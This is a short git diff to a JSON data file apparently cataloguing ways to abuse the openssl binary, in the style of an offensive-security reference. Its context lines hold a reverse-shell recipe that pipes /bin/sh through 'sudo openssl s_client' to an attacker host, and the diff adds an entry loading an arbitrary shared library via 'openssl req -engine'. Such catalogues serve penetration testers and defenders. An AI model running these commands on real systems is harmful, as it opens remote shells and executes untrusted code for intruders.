diff --git a/data/openssl.json b/data/openssl.json index 961fc85..e648e85 100644 --- a/data/openssl.json +++ b/data/openssl.json @@ -45,6 +45,11 @@ "description": "To receive the shell run the following on the attacker box:\n\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [port]\n\nCommunication between attacker and target will be encrypted.", "code": "mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect [host]:[port] > /tmp/s; rm /tmp/s\n" } + ], + "library-load": [ + { + "code": "openssl req -engine ./lib.so" + } ] } } \ No newline at end of file